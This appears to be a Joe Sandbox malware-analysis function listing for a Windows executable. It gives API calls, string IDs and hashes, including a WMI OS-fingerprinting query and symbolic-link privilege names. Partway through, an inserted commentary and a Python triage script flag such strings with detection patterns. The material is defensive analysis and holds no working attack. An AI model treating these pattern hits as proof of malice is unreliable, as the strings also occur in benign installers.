                                                                  • Instruction Fuzzy Hash: F551DFB1A087119FC748CF29D48055AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction ID: a54280d15d8133fc69b7938a9a6163955b0bc143aef1b0414f87bce942986f8c
                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction Fuzzy Hash: 1F312C71A147468FCB18DF15C85116EBBE0FB95305F104A2EE4C5C7342D739EA1ACB96
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0045E30E
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                    • Part of subcall function 00461DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00491030,00000200,0045D928,00000000,?,00000050,00491030), ref: 00461DC4
                                                                  • _strlen.LIBCMT ref: 0045E32F
                                                                  • SetDlgItemTextW.USER32(?,0048E274,?), ref: 0045E38F
                                                                  • GetWindowRect.USER32(?,?), ref: 0045E3C9
                                                                  • GetClientRect.USER32(?,?), ref: 0045E3D5
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045E475
                                                                  • GetWindowRect.USER32(?,?), ref: 0045E4A2
                                                                  • SetWindowTextW.USER32(?,?), ref: 0045E4DB
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0045E4E3
                                                                  • GetWindow.USER32(?,00000005), ref: 0045E4EE
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0045E51B
                                                                  • GetWindow.USER32(00000000,00000002), ref: 0045E58D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                  • String ID: $%s:$CAPTION$d$tH
                                                                  • API String ID: 2407758923-3054491469
                                                                  • Opcode ID: 3e0dd7e57c7a6da6f92882fa1a450a133258462e4553e6f553767ec8b07b964d
                                                                  • Instruction ID: 27f67eb4d2f03411dc33bdc4038e6f3546ac7297ff9430a42394df11c0bffca6
                                                                  • Opcode Fuzzy Hash: 3e0dd7e57c7a6da6f92882fa1a450a133258462e4553e6f553767ec8b07b964d
                                                                  • Instruction Fuzzy Hash: 3981B171108301AFD714DFA9CD88A6FBBEDEB89705F04092EFA84D7251D734E9098B56
                                                                  APIs
                                                                  • ___free_lconv_mon.LIBCMT ref: 0047CB66
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C71E
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C730
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C742
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C754
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C766
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C778
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C78A
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C79C
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7AE
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7C0
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7D2
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7E4
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7F6
                                                                  • _free.LIBCMT ref: 0047CB5B
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 0047CB7D
                                                                  • _free.LIBCMT ref: 0047CB92
                                                                  • _free.LIBCMT ref: 0047CB9D
                                                                  • _free.LIBCMT ref: 0047CBBF
                                                                  • _free.LIBCMT ref: 0047CBD2
                                                                  • _free.LIBCMT ref: 0047CBE0
                                                                  • _free.LIBCMT ref: 0047CBEB
                                                                  • _free.LIBCMT ref: 0047CC23
                                                                  • _free.LIBCMT ref: 0047CC2A
                                                                  • _free.LIBCMT ref: 0047CC47
                                                                  • _free.LIBCMT ref: 0047CC5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                  • String ID: hH
                                                                  • API String ID: 161543041-101857925
                                                                  • Opcode ID: f2c8d692c088491f54a6b4ce72c1e50cb711a879b2b7238ec6e080c4ae4feb65
                                                                  • Instruction ID: 6bb45df054ee4357b5f03d23ba3c797f61a9f35f0cf66e6ad0a6aa585533deae
                                                                  • Opcode Fuzzy Hash: f2c8d692c088491f54a6b4ce72c1e50cb711a879b2b7238ec6e080c4ae4feb65
                                                                  • Instruction Fuzzy Hash: F2311D315002059FEB31AA39E885B9B77E5AF20324F14D41FF55CD6291DF39E844CB58
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00479705
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 00479711
                                                                  • _free.LIBCMT ref: 0047971C
                                                                  • _free.LIBCMT ref: 00479727
                                                                  • _free.LIBCMT ref: 00479732
                                                                  • _free.LIBCMT ref: 0047973D
                                                                  • _free.LIBCMT ref: 00479748
                                                                  • _free.LIBCMT ref: 00479753
                                                                  • _free.LIBCMT ref: 0047975E
                                                                  • _free.LIBCMT ref: 0047976C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID: 0dH
                                                                  • API String ID: 776569668-2730253187
                                                                  • Opcode ID: b492e13a4ed3a17b0bf9c438a8e430fd800573af9dcabaa963a1509bb3c0cb43
                                                                  • Instruction ID: 2a16b7d9ebbca01131138b50073f5e6d03c59eb2d770e72693b5718c3555e17e
                                                                  • Opcode Fuzzy Hash: b492e13a4ed3a17b0bf9c438a8e430fd800573af9dcabaa963a1509bb3c0cb43
                                                                  • Instruction Fuzzy Hash: 6D11E976140009BFCB11EF95C846CDD3B75EF24364B01A4AAFA0C4F262DE35DE549B88
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00469736
                                                                  • _wcslen.LIBCMT ref: 004697D6
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004697E5
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00469806
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0046982D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                  • API String ID: 1777411235-4209811716
                                                                  • Opcode ID: 9581e626ffcebffaba2dea59d2d26c9873131429668b0bc4a0f8079003c41257
                                                                  • Instruction ID: 5e151ba24f1cde93937be8bc704d9146eab135c15256ab83f4672e0c842db9e1
                                                                  • Opcode Fuzzy Hash: 9581e626ffcebffaba2dea59d2d26c9873131429668b0bc4a0f8079003c41257
                                                                  • Instruction Fuzzy Hash: 533103321083027AD725AF259C06FAF779C9F82725F14451FF50596292FBBC9E0483AE
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000005), ref: 0046D6C1
                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0046D6ED
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0046D709
                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0046D720
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0046D734
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0046D75D
                                                                  • DeleteObject.GDI32(00000000), ref: 0046D764
                                                                  • GetWindow.USER32(00000000,00000002), ref: 0046D76D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                  • String ID: STATIC
                                                                  • API String ID: 3820355801-1882779555
                                                                  • Opcode ID: 57b13642faa82441873e1f96007a336983c9fc77304e78ebc69cefc7af8d056d
                                                                  • Instruction ID: 905fb50882cf167d5b0db5a7531a228afff69e3d7bce1d52f5ee40946541a9ef
                                                                  • Opcode Fuzzy Hash: 57b13642faa82441873e1f96007a336983c9fc77304e78ebc69cefc7af8d056d
                                                                  • Instruction Fuzzy Hash: 13112472E007107BE3207F769C4AFAF765CAF40706F004636FA42A2191FA688B0546BF
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 322700389-393685449
                                                                  • Opcode ID: 052636c715f44e9486af31da1d7bbfbc19b2b4b2d015152e1643f80acf9d8aac
                                                                  • Instruction ID: e12ee636bd5401556fff929e6ecf2220e9446a0124b101ae5c7a8c0974939340
                                                                  • Opcode Fuzzy Hash: 052636c715f44e9486af31da1d7bbfbc19b2b4b2d015152e1643f80acf9d8aac
                                                                  • Instruction Fuzzy Hash: 3BB17631800209EFCF29DFA5C9819EFB7B5EF04315B54805BE8086B302C779EA11EB99
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nF
                                                                  • API String ID: 3519838083-1812640087
                                                                  • Opcode ID: c92e64ec14f9de4601c59f99186007efac848fdf55587c60cab5349861065e5f
                                                                  • Instruction ID: 8ddd9fbbf4075a786843a2c7959497a59a25b8ee64579fef734631a35b79178a
                                                                  • Opcode Fuzzy Hash: c92e64ec14f9de4601c59f99186007efac848fdf55587c60cab5349861065e5f
                                                                  • Instruction Fuzzy Hash: EB71AF71A00219AFDB14DF65CC959AFB7B8FF48716B10066EE802A72A1CB34AD05CB64
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00456FAA
                                                                  • _wcslen.LIBCMT ref: 00457013
                                                                  • _wcslen.LIBCMT ref: 00457084
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3122303884-3508440684
                                                                  • Opcode ID: b4ebe9704a8fe0a6bfe53f04c033f1a423972d558e4257225f8e123df29b61e7
                                                                  • Instruction ID: ec1d31132cacbcc435e5404bb5d9391bc1016afc7a06c482fcdf07f5ff9b96da
                                                                  • Opcode Fuzzy Hash: b4ebe9704a8fe0a6bfe53f04c033f1a423972d558e4257225f8e123df29b61e7
                                                                  • Instruction Fuzzy Hash: 3741E6B1D087447AEB20EB71AC42FEF77685B04709F00446BFD45A7283D67CAA4C8729
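The two function records above are the ones in this section that carry a security-relevant signal: one queries WMI (ROOT\CIMV2, SELECT * FROM Win32_OperatingSystem, "Windows 10") to fingerprint the host OS, and the other references SeCreateSymbolicLinkPrivilege and SeRestorePrivilege alongside the NT path prefixes \??\ and UNC\, i.e. it enables privileges before creating links or reparse points. A practitioner triaging a long Joe Sandbox function listing usually wants those records pulled out automatically rather than read line by line. The script below is an added example and is not part of the Joe Sandbox report or the IDA plugin: it parses the report's own "Similarity" bullet layout, splits the String ID field on the "$" separator the report uses, and tags strings that match a small set of triage patterns. The sample text is constructed from the three String ID lines shown on this page, the tag names and patterns are my own assumptions, and the script does not recompute Joe's API/String/Opcode IDs, whose hashing is not documented here. Two caveats: "$" is also a literal character in some String IDs (for example the "$%s:$CAPTION$d$tH" record above), so the split is lossy, and benign installers use the same privilege names and path prefixes, so a hit is a reason to look, not a verdict.

```python
"""Pull security-relevant function records out of a Joe Sandbox 'Similarity' listing.

Added example for this page; not Joe Sandbox or IDA plugin code.
The SAMPLE_REPORT text is constructed from String ID lines on the page.
"""
import re

# Constructed sample: three records in the report's own "• Key: value" bullet layout.
SAMPLE_REPORT = """
Similarity
• API ID: H_prolog
• String ID: Name$ROOT\\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nF
• API String ID: 3519838083-1812640087
• Opcode ID: c92e64ec14f9de4601c59f99186007efac848fdf55587c60cab5349861065e5f
Similarity
• API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\\$\\??\\
• API String ID: 3122303884-3508440684
• Opcode ID: b4ebe9704a8fe0a6bfe53f04c033f1a423972d558e4257225f8e123df29b61e7
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• API String ID: 3214253823-2177901306
• Opcode ID: d1ca44bd13d8d444b81eb4bc9b6ec63b76ff4aa275921088585ca442f3eadbe2
"""

# Triage heuristics (assumed, not from the report). Each pattern is tested
# against one string at a time after the String ID field has been split.
SUSPICIOUS = [
    ("wmi-os-query", re.compile(r"SELECT \* FROM Win32_OperatingSystem|ROOT\\CIMV2", re.I)),
    ("privilege-name", re.compile(r"^Se\w+Privilege$")),
    ("nt-path-prefix", re.compile(r"^(\\\?\?\\|UNC\\)$")),
]


def parse_blocks(text: str) -> list[dict]:
    """Return one dict per 'Similarity' record, keyed by the bullet labels
    ('API ID', 'String ID', 'Opcode ID', ...)."""
    blocks: list[dict] = []
    current: dict | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Similarity":
            current = {}
            blocks.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        # Only the first ': ' separates label from value; values may contain ': ' too.
        key, sep, value = line.lstrip("•").strip().partition(": ")
        if sep:
            current[key] = value
    return blocks


def split_strings(string_id: str) -> list[str]:
    """Split a String ID field on the report's '$' separator.
    Lossy when a string itself contains '$'; empty pieces are dropped."""
    return [s for s in string_id.split("$") if s]


def flag_blocks(blocks: list[dict]) -> list[dict]:
    """Return the records whose strings match any triage pattern, with the hits."""
    flagged = []
    for block in blocks:
        hits = [
            (tag, s)
            for s in split_strings(block.get("String ID", ""))
            for tag, pattern in SUSPICIOUS
            if pattern.search(s)
        ]
        if hits:
            flagged.append({
                "api_id": block.get("API ID", ""),
                "opcode_id": block.get("Opcode ID", ""),
                "hits": hits,
            })
    return flagged


if __name__ == "__main__":
    for rec in flag_blocks(parse_blocks(SAMPLE_REPORT)):
        print(rec["opcode_id"][:16], rec["api_id"])
        for tag, s in rec["hits"]:
            print("   ", tag, "->", s)
```

Run against a full report export, the same parser works on every "Similarity" record because the bullet layout is uniform; extend SUSPICIOUS with whatever strings matter for the case at hand (registry Run keys, scheduled-task verbs, Defender cmdlets) and keep the Opcode ID in the output so a hit can be tied back to the exact function in the listing.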
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046B610
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0046B637
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0046B650
                                                                  • SetWindowTextW.USER32(?,?), ref: 0046B661
                                                                  • GetDlgItem.USER32(?,00000065), ref: 0046B66A
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0046B67E
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0046B694
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                  • String ID: LICENSEDLG
                                                                  • API String ID: 3214253823-2177901306
                                                                  • Opcode ID: d1ca44bd13d8d444b81eb4bc9b6ec63b76ff4aa275921088585ca442f3eadbe2
                                                                  • Instruction ID: 2c973153cf1bf023238fdcf0040887b292e72f6ee013714947279902f94aa4dd
                                                                  • Opcode Fuzzy Hash: d1ca44bd13d8d444b81eb4bc9b6ec63b76ff4aa275921088585ca442f3eadbe2
                                                                  • Instruction Fuzzy Hash: F521D332600205BBD211AF67ED49F3B3B6CEB46B56F01403AF600D65A0EB6A9941967F
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C566B0C9,00000001,00000000,00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FD99
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE14
• SysAllocString.OLEAUT32(00000000), ref: 0046FE1F
• _com_issue_error.COMSUPP ref: 0046FE48
• _com_issue_error.COMSUPP ref: 0046FE52
• GetLastError.KERNEL32(80070057,C566B0C9,00000001,00000000,00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE57
• _com_issue_error.COMSUPP ref: 0046FE6A
• GetLastError.KERNEL32(00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE80
• _com_issue_error.COMSUPP ref: 0046FE93
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• API String ID: 1353541977-0
APIs
• __EH_prolog.LIBCMT ref: 00459387
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004593AA
• GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004593C9
  • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
  • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
• _swprintf.LIBCMT ref: 00459465
  • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
• MoveFileW.KERNEL32(?,?), ref: 004594D4
• MoveFileW.KERNEL32(?,?), ref: 00459514
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
